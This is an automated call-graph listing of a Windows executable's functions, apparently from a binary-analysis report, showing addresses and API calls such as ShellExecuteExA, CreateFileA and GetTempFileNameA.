13537->13990 13543 403a9c ctype 29 API calls 13538->13543 13544 401693 13539->13544 13545 40169f 13539->13545 13546 4018e9 13540->13546 13543->13441 14071 401de3 13544->14071 13552 401a18 31 API calls 13545->13552 13551 403a9c ctype 29 API calls 13546->13551 13555 4012ce 13549->13555 13557 4018f1 13551->13557 13558 4016aa ShellExecuteExA 13552->13558 13554 401a18 31 API calls 13560 40174c 13554->13560 13556 4012eb 13555->13556 13561 401d7a 30 API calls 13555->13561 13562 40139d 13556->13562 13570 4012fd MessageBoxW 13556->13570 13563 403a9c ctype 29 API calls 13557->13563 13564 4016e6 13558->13564 13565 40170d 13558->13565 14079 40587c 13560->14079 13561->13556 13569 401c80 30 API calls 13562->13569 13571 4018fc 13563->13571 13572 4016f7 13564->13572 14074 411093 MessageBoxW 13564->14074 13568 403a9c ctype 29 API calls 13565->13568 13566 401c80 30 API calls 13573 4017ab 13566->13573 13575 40171e 13568->13575 13576 4013aa 13569->13576 13570->13562 13577 401315 13570->13577 13578 403a9c ctype 29 API calls 13571->13578 13581 403a9c ctype 29 API calls 13572->13581 13997 401e56 13573->13997 13583 403a9c ctype 29 API calls 13575->13583 13584 404073 30 API calls 13576->13584 13585 403a9c ctype 29 API calls 13577->13585 13586 401904 13578->13586 13588 4016ff 13581->13588 13582 403a9c ctype 29 API calls 13589 401767 13582->13589 13590 401726 13583->13590 13591 4013bf 13584->13591 13592 401320 13585->13592 13593 403a9c ctype 29 API calls 13586->13593 13595 403a9c ctype 29 API calls 13588->13595 13589->13537 13596 40176d 13589->13596 13598 40195a 13590->13598 13599 401d7a 30 API calls 13591->13599 13600 403a9c ctype 29 API calls 13592->13600 13601 40190c 13593->13601 13594 403a9c ctype 29 API calls 13602 4017c3 13594->13602 13603 401707 13595->13603 13597 4018af SetCurrentDirectoryA 13596->13597 14087 411093 MessageBoxW 13596->14087 13597->13499 13606 401960 WaitForSingleObject CloseHandle 13598->13606 13607 401974 SetCurrentDirectoryA 13598->13607 13608 4013c8 13599->13608 13609 401328 13600->13609 13610 403a9c ctype 29 API calls 13601->13610 13611 403a9c ctype 29 API calls 13602->13611 13604 401782 13603->13604 13604->13597 13606->13607 13613 403a9c ctype 29 API calls 13607->13613 13612 403a9c ctype 29 API calls 13608->13612 13614 403a9c ctype 29 API calls 13609->13614 13615 401914 13610->13615 13616 4017cb 13611->13616 13618 4013d3 13612->13618 13619 401981 13613->13619 13614->13439 13620 403a9c ctype 29 API calls 13615->13620 13617 401c80 30 API calls 13616->13617 13621 4017da 13617->13621 13622 403a9c ctype 29 API calls 13618->13622 13623 403a9c ctype 29 API calls 13619->13623 13624 40191c 13620->13624 13626 401e56 30 API calls 13621->13626 13627 4013db 13622->13627 13623->13441 13625 403a9c ctype 29 API calls 13624->13625 13628 401924 13625->13628 13629 4017ed 13626->13629 13630 401c80 30 API calls 13627->13630 13631 403a9c ctype 29 API calls 13628->13631 13632 403a9c ctype 29 API calls 13629->13632 13633 4013ea 13630->13633 13631->13634 13635 4017f5 13632->13635 13636 404073 30 API calls 13633->13636 13689 416c96 13634->13689 13637 401811 13635->13637 14088 401db8 13635->14088 13638 4013ff 13636->13638 14001 402634 13637->14001 13639 401d7a 30 API calls 13638->13639 13642 401408 13639->13642 13645 403a9c ctype 29 API calls 13642->13645 13648 401413 13645->13648 13646 401de3 30 API calls 13646->13637 13650 403a9c ctype 29 API calls 13648->13650 13653 40141b 13650->13653 13656 401c80 30 API calls 13653->13656 13659 40142a 13656->13659 13662 404073 30 API calls 13659->13662 13663 401443 13662->13663 13664 402634 30 API calls 13663->13664 13665 401450 13664->13665 13666 401d7a 30 API calls 13665->13666 13667 401459 13666->13667 13668 403a9c ctype 29 API calls 13667->13668 13669 401464 13668->13669 13670 403a9c ctype 29 API calls 13669->13670 13671 40146f 13670->13671 13672 403a9c ctype 29 API calls 13671->13672 13673 401477 13672->13673 13674 403a9c ctype 29 API calls 13673->13674 13675 401482 13674->13675 13676 403a9c ctype 29 API calls 13675->13676 13677 40148a 13676->13677 13678 403a9c ctype 29 API calls 13677->13678 13679 401492 13678->13679 13680 4042d6 ctype 34 API calls 13679->13680 13681 4014a6 13680->13681 13682 4042ad ctype 34 API calls 13681->13682 13682->13421 13684 414c3a 13683->13684 13685 414c3f 13683->13685 13686 4177fd ctype 7 API calls 13684->13686 13687 417836 ctype 7 API calls 13685->13687 13686->13685 13688 414c48 ExitProcess 13687->13688 16362 416cb8 13689->16362 13692 417039 13693 415523 35 API calls 13692->13693 13694 417044 13693->13694 13695 41716a UnhandledExceptionFilter 13694->13695 13696 414bfe 13694->13696 13695->13696 13711 413cc0 13697->13711 13700 4158f3 GetEnvironmentVariableA 13704 415912 13700->13704 13708 4159d0 13700->13708 13701 4158d9 13701->13700 13702 4158eb 13701->13702 13702->13283 13702->13284 13705 415957 GetModuleFileNameA 13704->13705 13706 41594f 13704->13706 13705->13706 13706->13708 13713 4179f0 13706->13713 13708->13702 13716 415883 GetModuleHandleA 13708->13716 13710 415a71 13709->13710 13710->13287 13712 413ccc GetVersionExA 13711->13712 13712->13700 13712->13701 13718 417a07 13713->13718 13717 41589a 13716->13717 13717->13702 13720 417a1f 13718->13720 13722 417a4f 13720->13722 13727 4187a8 13720->13727 13721 4187a8 6 API calls 13721->13722 13722->13721 13724 417b78 13722->13724 13726 417a03 13722->13726 13731 41866d 13722->13731 13724->13726 13742 416eea 13724->13742 13726->13708 13728 4187c6 13727->13728 13730 4187ba 13727->13730 13745 418a6c 13728->13745 13730->13720 13732 41868b InterlockedIncrement 13731->13732 13734 418678 13731->13734 13733 4186a7 InterlockedDecrement 13732->13733 13738 4186b1 13732->13738 13735 41570a ctype 29 API calls 13733->13735 13734->13722 13735->13738 13757 4186dc 13738->13757 13739 4186d1 InterlockedDecrement 13739->13734 13740 4186c7 13763 41576b LeaveCriticalSection 13740->13763 13782 415523 GetLastError TlsGetValue 13742->13782 13744 416eef 13744->13726 13746 418a9d GetStringTypeW 13745->13746 13747 418ab5 13745->13747 13746->13747 13748 418ab9 GetStringTypeA 13746->13748 13750 418ae0 GetStringTypeA 13747->13750 13752 418b04 13747->13752 13748->13747 13749 418ba1 13748->13749 13749->13730 13750->13749 13752->13749 13753 418b1a MultiByteToWideChar 13752->13753 13753->13749 13754 418b3e ctype 13753->13754 13754->13749 13755 418b78 MultiByteToWideChar 13754->13755 13755->13749 13756 418b91 GetStringTypeW 13755->13756 13756->13749 13758 418707 13757->13758 13762 4186be 13757->13762 13759 418723 13758->13759 13760 4187a8 6 API calls 13758->13760 13759->13762 13764 41881d 13759->13764 13760->13759 13762->13739 13762->13740 13763->13734 13765 418869 13764->13765 13766 41884d LCMapStringW 13764->13766 13769 4188b2 LCMapStringA 13765->13769 13770 4188cf 13765->13770 13766->13765 13767 418871 LCMapStringA 13766->13767 13767->13765 13768 4189ab 13767->13768 13768->13762 13769->13768 13770->13768 13771 4188e5 MultiByteToWideChar 13770->13771 13771->13768 13772 41890f 13771->13772 13772->13768 13773 418945 MultiByteToWideChar 13772->13773 13773->13768 13774 41895e LCMapStringW 13773->13774 13774->13768 13775 418979 13774->13775 13776 41897f 13775->13776 13778 4189bf 13775->13778 13776->13768 13777 41898d LCMapStringW 13776->13777 13777->13768 13778->13768 13779 4189f7 LCMapStringW 13778->13779 13779->13768 13780 418a0f WideCharToMultiByte 13779->13780 13780->13768 13783 41553f 13782->13783 13784 41557e SetLastError 13782->13784 13793 416efc 13783->13793 13784->13744 13787 415550 TlsSetValue 13788 415576 13787->13788 13789 415561 13787->13789 13790 414c0c ctype 7 API calls 13788->13790 13792 415567 GetCurrentThreadId 13789->13792 13791 41557d 13790->13791 13791->13784 13792->13784 13801 416f31 ctype 13793->13801 13794 415548 13794->13787 13794->13788 13795 41570a 29 API calls ctype 13795->13801 13796 416fe9 HeapAlloc 13796->13801 13797 415df1 ctype 5 API calls 13797->13801 13798 416894 ctype 6 API calls 13798->13801 13801->13794 13801->13795 13801->13796 13801->13797 13801->13798 13802 416f95 13801->13802 13805 41701e 13801->13805 13808 41576b LeaveCriticalSection 13802->13808 13804 416f9c 13804->13801 13809 41576b LeaveCriticalSection 13805->13809 13807 417025 13807->13801 13808->13804 13809->13807 13810->13292 13812 41821b 13811->13812 13813 418222 13811->13813 13815 417e3a 13812->13815 13813->13339 13816 41570a ctype 29 API calls 13815->13816 13817 417e4a 13816->13817 13826 417fe7 13817->13826 13821 417fdf 13821->13813 13823 417e86 GetCPInfo 13825 417e9c 13823->13825 13824 417e61 13839 41576b LeaveCriticalSection 13824->13839 13825->13824 13831 41808d GetCPInfo 13825->13831 13827 418007 13826->13827 13828 417ff7 GetOEMCP 13826->13828 13829 417e52 13827->13829 13830 41800c GetACP 13827->13830 13828->13827 13829->13823 13829->13824 13829->13825 13830->13829 13832 418178 13831->13832 13836 4180b0 13831->13836 13832->13824 13833 418a6c 6 API calls 13834 41812c 13833->13834 13835 41881d 9 API calls 13834->13835 13837 418150 13835->13837 13836->13833 13838 41881d 9 API calls 13837->13838 13838->13832 13839->13821 13841 40102d 13840->13841 13842 402170 13841->13842 13843 402180 13842->13843 13844 401055 13842->13844 13845 403a76 30 API calls 13843->13845 13844->13368 13846 40218a 13845->13846 13846->13844 13847 403a9c ctype 29 API calls 13846->13847 13847->13844 13849 401c9e 13848->13849 13850 402170 30 API calls 13849->13850 13851 40109a 13850->13851 13852 4038ee 13851->13852 13857 4038f8 __EH_prolog 13852->13857 13853 40396d 13854 401e19 30 API calls 13853->13854 13856 40397c 13854->13856 13855 401db8 30 API calls 13855->13857 13858 401d7a 30 API calls 13856->13858 13857->13853 13857->13855 13861 4010ac 13857->13861 13859 403989 13858->13859 13860 403a9c ctype 29 API calls 13859->13860 13860->13861 13862 403a9c 13861->13862 13863 413f9f ctype 29 API calls 13862->13863 13864 4010b4 13863->13864 13864->13380 13866 4045ec __EH_prolog 13865->13866 13867 40460b GetModuleFileNameW 13866->13867 13868 40463f 13866->13868 13869 404625 13867->13869 13870 404637 13867->13870 13871 40243e 30 API calls 13868->13871 13869->13870 13875 401d1b 30 API calls 13869->13875 13873 4010d5 13870->13873 13872 404652 13871->13872 14104 404598 GetModuleFileNameA 13872->14104 13885 40235e 13873->13885 13875->13870 13877 40468e 13880 403a9c ctype 29 API calls 13877->13880 13878 404663 AreFileApisANSI 14108 403b9c 13878->14108 13880->13870 13882 401d7a 30 API calls 13883 404686 13882->13883 13884 403a9c ctype 29 API calls 13883->13884 13884->13877 13886 402368 __EH_prolog 13885->13886 14126 4025a3 13886->14126 13888 402377 13889 403a9c ctype 29 API calls 13888->13889 13890 4010dd 13889->13890 13891 402323 13890->13891 13892 40232d __EH_prolog 13891->13892 13893 4025a3 30 API calls 13892->13893 13894 40233c 13893->13894 13895 403a9c ctype 29 API calls 13894->13895 13896 4010e5 13895->13896 13896->13388 14140 40220e 13897->14140 13900 403b4f 13903 403b58 13900->13903 13901 403aa7 5 API calls ctype 13901->13903 13902 40110e 13902->13394 13903->13901 13903->13902 13905 40244e 13904->13905 13909 40116c 13904->13909 13906 403a76 30 API calls 13905->13906 13907 402455 13906->13907 13907->13907 13908 403a9c ctype 29 API calls 13907->13908 13907->13909 13908->13909 13910 401af4 13909->13910 13911 401afe __EH_prolog 13910->13911 14153 405b6d 13911->14153 13913 401b30 13913->13405 13915 401b2c ctype 13915->13913 14156 405bca 13915->14156 14160 401ee5 13915->14160 13918 40243e 30 API calls 13917->13918 13919 4014c2 13918->13919 13920 405298 13919->13920 13921 401a2d 36 API calls 13920->13921 13922 4052a0 13921->13922 14224 4051c8 13922->14224 13926 413e65 ctype 29 API calls 13925->13926 13927 403a81 13926->13927 13928 403a9a 13927->13928 14326 413d3d RaiseException 13927->14326 13928->13457 13931 408111 __EH_prolog 13930->13931 13932 4042d6 ctype 34 API calls 13931->13932 13934 408120 13932->13934 13935 401d1b 30 API calls 13934->13935 13939 401526 13934->13939 14327 4081a8 13934->14327 14330 407f06 13934->14330 14357 408248 13934->14357 14365 402092 13934->14365 13935->13934 13939->13468 13939->13469 13941 403b9c 31 API calls 13940->13941 13942 40154c 13941->13942 13942->13481 13944 402f1f __EH_prolog 13943->13944 14443 403376 13944->14443 13947 401d7a 30 API calls 13948 402f53 13947->13948 13949 401d7a 30 API calls 13948->13949 13950 402f61 13949->13950 13951 403a76 30 API calls 13950->13951 13952 402f6b 13951->13952 13954 402f7e 13952->13954 14509 4034e3 13952->14509 13955 403037 13954->13955 13956 402f9a 13954->13956 14451 403113 13955->14451 14523 413220 13956->14523 13959 403042 13961 401d7a 30 API calls 13959->13961 13960 402fc2 13962 402fd5 13960->13962 13963 402fc8 13960->13963 13965 403050 13961->13965 13964 402170 30 API calls 13962->13964 14529 4131e0 13963->14529 13967 402fe8 13964->13967 13968 403065 13965->13968 13971 401d7a 30 API calls 13965->13971 13970 40602f 33 API calls 13967->13970 14499 40348a 13968->14499 13972 402ff7 13970->13972 13971->13968 13974 401d7a 30 API calls 13972->13974 13976 403004 13974->13976 13977 403a9c ctype 29 API calls 13976->13977 13978 403010 13977->13978 14533 40309d 13978->14533 13980 403021 13981 403a9c ctype 29 API calls 13980->13981 13982 403029 13981->13982 13983 4131e0 ctype 2 API calls 13982->13983 13984 403035 13983->13984 13984->13959 13986 405041 13985->13986 13987 405047 GetCurrentDirectoryA 13985->13987 13988 40243e 30 API calls 13986->13988 13989 405059 13987->13989 13988->13987 13989->13520 13991 402170 30 API calls 13990->13991 13992 401796 13991->13992 13993 405d0b 13992->13993 13994 40179e 13993->13994 13995 405d16 13993->13995 13994->13566 13995->13994 13996 401db8 30 API calls 13995->13996 13996->13994 13998 4017bb 13997->13998 13999 401e69 13997->13999 13998->13594 13999->13998 16177 402399 13999->16177 14002 40263e __EH_prolog 14001->14002 14003 401ce1 30 API calls 14002->14003 14004 402651 14003->14004 14005 401de3 30 API calls 14004->14005 14006 402660 14005->14006 14015 40220e 30 API calls 14014->14015 14016 401138 14015->14016 14017 401d7a 14016->14017 14018 401d86 14017->14018 14020 401d98 14017->14020 14019 402170 30 API calls 14018->14019 14019->14020 14020->13406 14021->13410 14023 403d64 __EH_prolog 14022->14023 14024 4042d6 ctype 34 API calls 14023->14024 14047 403d75 14024->14047 14025 402ee1 30 API calls 14025->14047 14027 403eec 14028 403a9c ctype 29 API calls 14027->14028 14029 403ef4 14028->14029 14030 403a9c ctype 29 API calls 14029->14030 14031 403efc 14030->14031 14032 403a9c ctype 29 API calls 14031->14032 14033 4011f5 14032->14033 14033->13437 14033->13438 14034 40243e 30 API calls 14034->14047 14035 403f09 14036 403a9c ctype 29 API calls 14035->14036 14038 403f11 14036->14038 14037 40411f 30 API calls 14037->14047 14039 403a9c ctype 29 API calls 14038->14039 14040 403f19 14039->14040 14042 403a9c ctype 29 API calls 14040->14042 14043 403f21 14042->14043 14046 403a9c ctype 29 API calls 14043->14046 14044 403a9c 29 API calls ctype 14044->14047 14045 401ee5 30 API calls 14045->14047 14046->14033 14047->14025 14047->14027 14047->14033 14047->14034 14047->14035 14047->14037 14047->14044 14047->14045 16185 403f3c 14047->16185 16195 4040be 14047->16195 16205 40213f 14047->16205 14049->13439 14051 40408b 14050->14051 14052 4040a5 14051->14052 14053 40408f 14051->14053 14055 401ce1 30 API calls 14052->14055 14054 402170 30 API calls 14053->14054 14056 401231 14054->14056 14055->14056 14056->13456 14058 4042eb ctype 34 API calls 14057->14058 14059 401344 14058->14059 14060 4042ad 14059->14060 14061 4042b8 14060->14061 14062 4042d6 ctype 34 API calls 14061->14062 14063 4042c0 14062->14063 14064 403a9c ctype 29 API calls 14063->14064 14065 4042c8 14064->14065 14065->13459 14066->13441 14067->13441 16210 405f5e 14068->16210 14072 4021c4 30 API calls 14071->14072 14073 401df3 14072->14073 14073->13545 14074->13572 14076 401d38 14075->14076 14077 402170 30 API calls 14076->14077 14078 40173e 14077->14078 14078->13554 14080 405886 __EH_prolog 14079->14080 14081 404d51 30 API calls 14080->14081 14082 405895 14081->14082 14083 405806 32 API calls 14082->14083 14084 4058a2 14083->14084 14085 403a9c ctype 29 API calls 14084->14085 14086 401753 14085->14086 14086->13582 14087->13604 14089 4021c4 30 API calls 14088->14089 14090 401805 14089->14090 14090->13646 14100 401a35 14099->14100 14101 401a39 14099->14101 14100->13536 16272 404c4a 14101->16272 14105 4045c7 14104->14105 14107 4045d9 14104->14107 14105->14107 14121 4046ab 14105->14121 14107->13877 14107->13878 14109 403ba6 __EH_prolog 14108->14109 14110 402170 30 API calls 14109->14110 14111 403bc9 14110->14111 14112 403c10 14111->14112 14113 403be1 MultiByteToWideChar 14111->14113 14115 402170 30 API calls 14111->14115 14114 401ce1 30 API calls 14112->14114 14113->14112 14116 403bfb 14113->14116 14117 403c26 14114->14117 14115->14113 14125 413d3d RaiseException 14116->14125 14119 403a9c ctype 29 API calls 14117->14119 14120 403c2e 14119->14120 14120->13882 14122 4046c1 14121->14122 14122->14122 14123 40243e 30 API calls 14122->14123 14124 4046d0 14123->14124 14124->14107 14125->14112 14127 4025ad __EH_prolog 14126->14127 14128 402170 30 API calls 14127->14128 14129 4025c9 14128->14129 14130 401db8 30 API calls 14129->14130 14131 4025d6 14130->14131 14132 401db8 30 API calls 14131->14132 14133 4025e0 14132->14133 14134 401db8 30 API calls 14133->14134 14135 4025ea 14134->14135 14136 401ce1 30 API calls 14135->14136 14137 4025f6 14136->14137 14138 403a9c ctype 29 API calls 14137->14138 14139 4025fe 14138->14139 14139->13888 14142 402218 __EH_prolog 14140->14142 14141 40224c 14144 402170 30 API calls 14141->14144 14142->14141 14143 402241 14142->14143 14145 401ce1 30 API calls 14143->14145 14146 40225f 14144->14146 14152 401105 14145->14152 14147 402170 30 API calls 14146->14147 14148 40226c 14147->14148 14149 401ce1 30 API calls 14148->14149 14150 4022a0 14149->14150 14151 403a9c ctype 29 API calls 14150->14151 14151->14152 14152->13900 14163 405b4c 14153->14163 14157 405bd7 14156->14157 14159 405c03 14157->14159 14215 405ba8 14157->14215 14159->13915 14220 40248c 14160->14220 14166 405b2f 14163->14166 14169 4059b3 14166->14169 14170 4059bd __EH_prolog 14169->14170 14171 405a25 14170->14171 14172 4059ce 14170->14172 14187 405a63 14171->14187 14173 401c80 30 API calls 14172->14173 14176 4059d9 AreFileApisANSI 14173->14176 14190 403d04 14176->14190 14177 405a30 CreateFileW 14178 405a53 14177->14178 14178->13915 14183 403a9c ctype 29 API calls 14184 405a17 14183->14184 14185 403a9c ctype 29 API calls 14184->14185 14186 405a1f 14185->14186 14186->14178 14188 405a6d FindCloseChangeNotification 14187->14188 14189 405a2c 14187->14189 14188->14189 14189->14177 14189->14178 14198 403c43 14190->14198 14193 40597a 14194 405a63 FindCloseChangeNotification 14193->14194 14195 405985 14194->14195 14196 405989 CreateFileA 14195->14196 14197 4059ae 14195->14197 14196->14197 14197->14183 14199 403c4d __EH_prolog 14198->14199 14200 40243e 30 API calls 14199->14200 14201 403c6f 14200->14201 14202 403cd3 14201->14202 14204 403c90 WideCharToMultiByte 14201->14204 14206 40243e 30 API calls 14201->14206 14212 403d24 14202->14212 14204->14202 14207 403cbe 14204->14207 14206->14204 14211 413d3d RaiseException 14207->14211 14208 403a9c ctype 29 API calls 14210 403cf0 14208->14210 14210->14193 14211->14202 14213 40243e 30 API calls 14212->14213 14214 403ce8 14213->14214 14214->14208 14216 405bb5 14215->14216 14219 405b7b ReadFile 14216->14219 14218 405bc6 14218->14157 14219->14218 14221 401eef 14220->14221 14222 4024a0 14220->14222 14221->13915 14223 40243e 30 API calls 14222->14223 14223->14221 14225 4051d2 __EH_prolog 14224->14225 14240 405268 14225->14240 14228 405243 14266 4051a4 14228->14266 14229 4051a4 SetFileAttributesA DeleteFileA 14231 4051e3 14229->14231 14231->14228 14231->14229 14234 4014d3 14231->14234 14235 403a9c ctype 29 API calls 14231->14235 14238 405268 30 API calls 14231->14238 14239 40522c GetLastError 14231->14239 14243 40511b 14231->14243 14257 4058cd 14231->14257 14265 40498d CreateDirectoryA 14231->14265 14232 40524b 14233 403a9c ctype 29 API calls 14232->14233 14233->14234 14234->13435 14234->13436 14235->14231 14238->14231 14239->14231 14239->14234 14241 40243e 30 API calls 14240->14241 14242 405281 14241->14242 14242->14231 14244 405125 __EH_prolog 14243->14244 14245 40243e 30 API calls 14244->14245 14246 405141 14245->14246 14271 40506f 14246->14271 14248 40514c 14256 405164 14248->14256 14276 4050e5 14248->14276 14249 403a9c ctype 29 API calls 14251 405191 14249->14251 14251->14231 14254 405170 14255 4050e5 33 API calls 14254->14255 14254->14256 14255->14256 14256->14249 14258 4058d7 __EH_prolog 14257->14258 14297 404d51 14258->14297 14263 403a9c ctype 29 API calls 14264 4058fd 14263->14264 14264->14231 14265->14231 14267 4051b0 14266->14267 14268 4051ac 14266->14268 14320 404bdc 14267->14320 14268->14232 14270 4051b8 14270->14232 14272 405083 GetTempPathA 14271->14272 14273 40507d 14271->14273 14275 405095 14272->14275 14274 40243e 30 API calls 14273->14274 14274->14272 14275->14248 14277 4051a4 2 API calls 14276->14277 14278 4050ee 14277->14278 14288 4050ab 14278->14288 14280 4050ff 14281 405111 14280->14281 14293 4052f9 14280->14293 14281->14256 14283 4047db 14281->14283 14284 4047e9 14283->14284 14285 4047ef GetWindowsDirectoryA 14283->14285 14286 40243e 30 API calls 14284->14286 14287 404802 14285->14287 14286->14285 14287->14254 14289 4050c0 14288->14289 14290 4050c8 GetTempFileNameA 14288->14290 14291 40243e 30 API calls 14289->14291 14292 4050dd 14290->14292 14291->14290 14292->14280 14294 405305 14293->14294 14296 405316 14293->14296 14295 40243e 30 API calls 14294->14295 14295->14296 14296->14281 14298 40243e 30 API calls 14297->14298 14299 404d68 14298->14299 14300 405806 14299->14300 14301 405810 __EH_prolog 14300->14301 14306 40553a 14301->14306 14307 40551a FindClose 14306->14307 14308 40554b 14307->14308 14309 405566 14308->14309 14310 40554f FindFirstFileA 14308->14310 14313 40551a 14309->14313 14310->14309 14311 40556a 14310->14311 14316 40557f 14311->14316 14314 405524 FindClose 14313->14314 14315 40552f 14313->14315 14314->14315 14315->14263 14317 4055bd 14316->14317 14318 4046ab 30 API calls 14317->14318 14319 4055da 14318->14319 14319->14309 14325 40489c SetFileAttributesA 14320->14325 14322 404be6 14323 404bea 14322->14323 14324 404bec DeleteFileA 14322->14324 14323->14270 14324->14270 14325->14322 14326->13928 14328 402170 30 API calls 14327->14328 14329 4081c8 14328->14329 14329->13934 14331 407f10 __EH_prolog 14330->14331 14332 401c80 30 API calls 14331->14332 14333 407f67 14331->14333 14334 407f4c 14332->14334 14335 401c80 30 API calls 14333->14335 14355 407f93 14333->14355 14373 408062 14334->14373 14339 407f78 14335->14339 14336 408018 14338 4042d6 ctype 34 API calls 14336->14338 14341 408027 14338->14341 14342 408062 35 API calls 14339->14342 14344 4042ad ctype 34 API calls 14341->14344 14345 407f87 14342->14345 14343 403a9c ctype 29 API calls 14343->14333 14347 408033 14344->14347 14348 403a9c ctype 29 API calls 14345->14348 14346 402ee1 30 API calls 14346->14355 14349 4042d6 ctype 34 API calls 14347->14349 14348->14355 14350 408045 14349->14350 14351 4042ad ctype 34 API calls 14350->14351 14352 408051 14351->14352 14352->13934 14353 401d7a 30 API calls 14353->14355 14355->14336 14355->14346 14355->14353 14356 403a9c 29 API calls ctype 14355->14356 14386 4081e7 14355->14386 14356->14355 14358 408252 __EH_prolog 14357->14358 14359 403a76 30 API calls 14358->14359 14360 40825d 14359->14360 14361 408274 14360->14361 14426 40828f 14360->14426 14363 4039df 30 API calls 14361->14363 14364 408280 14363->14364 14364->13934 14366 40209c __EH_prolog 14365->14366 14367 4042d6 ctype 34 API calls 14366->14367 14368 4020c0 14367->14368 14369 4042ad ctype 34 API calls 14368->14369 14370 4020cb 14369->14370 14371 403a9c ctype 29 API calls 14370->14371 14372 4020d3 14371->14372 14372->13934 14374 40806c __EH_prolog 14373->14374 14375 4042d6 ctype 34 API calls 14374->14375 14376 40807e 14375->14376 14377 402170 30 API calls 14376->14377 14378 408093 14377->14378 14379 4080ef 14378->14379 14381 4080de 14378->14381 14383 401db8 30 API calls 14378->14383 14396 403998 14378->14396 14380 403a9c ctype 29 API calls 14379->14380 14382 407f5b 14380->14382 14381->14379 14384 403998 30 API calls 14381->14384 14382->14343 14383->14378 14384->14379 14387 4081f1 __EH_prolog 14386->14387 14388 403a76 30 API calls 14387->14388 14389 4081fd 14388->14389 14390 408227 14389->14390 14391 401ce1 30 API calls 14389->14391 14393 4039df 30 API calls 14390->14393 14392 408217 14391->14392 14394 401ce1 30 API calls 14392->14394 14395 408238 14393->14395 14394->14390 14395->14355 14397 4039a2 __EH_prolog 14396->14397 14398 403a76 30 API calls 14397->14398 14399 4039ad 14398->14399 14400 4039c4 14399->14400 14401 401ce1 30 API calls 14399->14401 14404 4039df 14400->14404 14401->14400 14403 4039d0 14403->14378 14407 4042ff 14404->14407 14408 4039e7 14407->14408 14409 404307 14407->14409 14408->14403 14411 404327 14409->14411 14412 4043cb 14411->14412 14413 40433b 14411->14413 14412->14408 14414 404358 14413->14414 14423 413d3d RaiseException 14413->14423 14416 40437f 14414->14416 14424 413d3d RaiseException 14414->14424 14418 403a76 30 API calls 14416->14418 14422 4043a7 14416->14422 14420 40438b 14418->14420 14419 403a9c ctype 29 API calls 14419->14412 14420->14422 14425 413d3d RaiseException 14420->14425 14422->14419 14423->14414 14424->14416 14425->14422 14427 408299 __EH_prolog 14426->14427 14428 401ce1 30 API calls 14427->14428 14429 4082c0 14428->14429 14432 4082e8 14429->14432 14433 4082f2 __EH_prolog 14432->14433 14434 4042d6 ctype 34 API calls 14433->14434 14435 408319 14434->14435 14438 408334 14435->14438 14439 404327 30 API calls 14438->14439 14440 40834c 14439->14440 14441 4082d0 14440->14441 14442 4081e7 30 API calls 14440->14442 14441->14361 14442->14440 14444 403380 __EH_prolog 14443->14444 14445 402170 30 API calls 14444->14445 14446 40339c 14445->14446 14447 402170 30 API calls 14446->14447 14448 4033b1 14447->14448 14449 402170 30 API calls 14448->14449 14450 402f3e 14449->14450 14450->13947 14452 40311d __EH_prolog 14451->14452 14547 402ee1 14452->14547 14457 403141 14458 401d1b 30 API calls 14457->14458 14459 40314f 14458->14459 14461 403a9c ctype 29 API calls 14459->14461 14460 403158 14556 408f0a 14460->14556 14494 4031c1 14461->14494 14463 403198 14464 4042ad ctype 34 API calls 14463->14464 14465 4031a6 14464->14465 14466 4031c6 14465->14466 14467 4031ab 14465->14467 14468 401ce1 30 API calls 14466->14468 14469 401d1b 30 API calls 14467->14469 14470 4031d2 14468->14470 14469->14459 14471 405d0b 30 API calls 14470->14471 14472 4031de 14471->14472 14616 4049dd 14472->14616 14475 40322a 14477 401c80 30 API calls 14475->14477 14476 4031ea 14743 409569 14476->14743 14479 403237 14477->14479 14651 402685 14479->14651 14485 403a9c ctype 29 API calls 14487 403269 14485->14487 14658 40bbc9 14487->14658 14707 40c231 14487->14707 14491 403284 14494->13959 14500 403494 __EH_prolog 14499->14500 14501 403a9c ctype 29 API calls 14500->14501 14502 4034aa 14501->14502 16086 40341c 14502->16086 14505 403a9c ctype 29 API calls 14506 4034cc 14505->14506 14507 403a9c ctype 29 API calls 14506->14507 14508 401581 14507->14508 14508->13494 14508->13495 14510 4034ed __EH_prolog 14509->14510 14511 402170 30 API calls 14510->14511 14512 40351f 14511->14512 14513 402170 30 API calls 14512->14513 14514 403535 14513->14514 14515 402170 30 API calls 14514->14515 14516 40354b 14515->14516 14517 402170 30 API calls 14516->14517 14518 403564 14517->14518 16096 4035a6 14518->16096 14521 402170 30 API calls 14522 403589 14521->14522 14522->13954 16115 4148be 14523->16115 14526 413243 14526->13960 14527 413248 GetLastError 14528 413252 14527->14528 14528->13960 14530 4131e9 CloseHandle 14529->14530 14532 402fd0 14529->14532 14531 4131f4 GetLastError 14530->14531 14530->14532 14531->14532 14532->13968 14534 4030a7 __EH_prolog 14533->14534 14535 401d7a 30 API calls 14534->14535 14536 4030bc 14535->14536 16145 40620b 14536->16145 14540 4030d4 14541 40602f 33 API calls 14540->14541 14542 4030df 14541->14542 16165 406049 14542->16165 14545 403a9c ctype 29 API calls 14546 4030f5 ShowWindow 14545->14546 14546->13980 14548 402170 30 API calls 14547->14548 14549 402ef5 14548->14549 14550 405841 14549->14550 14551 40584b __EH_prolog 14550->14551 14751 4055de 14551->14751 14554 40551a FindClose 14555 40313d 14554->14555 14555->14457 14555->14460 14557 408f14 __EH_prolog 14556->14557 14558 403a76 30 API calls 14557->14558 14559 408f31 14558->14559 14560 408f43 14559->14560 14873 409184 14559->14873 14562 402170 30 API calls 14560->14562 14563 408f7a 14562->14563 14564 402170 30 API calls 14563->14564 14565 408f91 14564->14565 14566 402170 30 API calls 14565->14566 14567 408fa8 14566->14567 14568 40906f 14567->14568 14792 404e76 14567->14792 14847 408a3b 14568->14847 14573 408fd3 GetLastError 14577 403a9c ctype 29 API calls 14573->14577 14574 40900e 14578 401e3a 30 API calls 14574->14578 14575 4090a1 14580 403a9c ctype 29 API calls 14575->14580 14576 4090d5 14582 402634 30 API calls 14576->14582 14581 408fe3 14577->14581 14579 40901d 14578->14579 14583 401d7a 30 API calls 14579->14583 14584 4090a9 14580->14584 14585 403a9c ctype 29 API calls 14581->14585 14586 4090e4 14582->14586 14587 40902a 14583->14587 14588 403a9c ctype 29 API calls 14584->14588 14589 408feb 14585->14589 14590 403998 30 API calls 14586->14590 14592 403a9c ctype 29 API calls 14587->14592 14593 4090b1 14588->14593 14594 403a9c ctype 29 API calls 14589->14594 14591 4090f3 14590->14591 14595 403a9c ctype 29 API calls 14591->14595 14596 409036 14592->14596 14597 403a9c ctype 29 API calls 14593->14597 14599 408ff3 14594->14599 14605 4090ff 14595->14605 14598 401e19 30 API 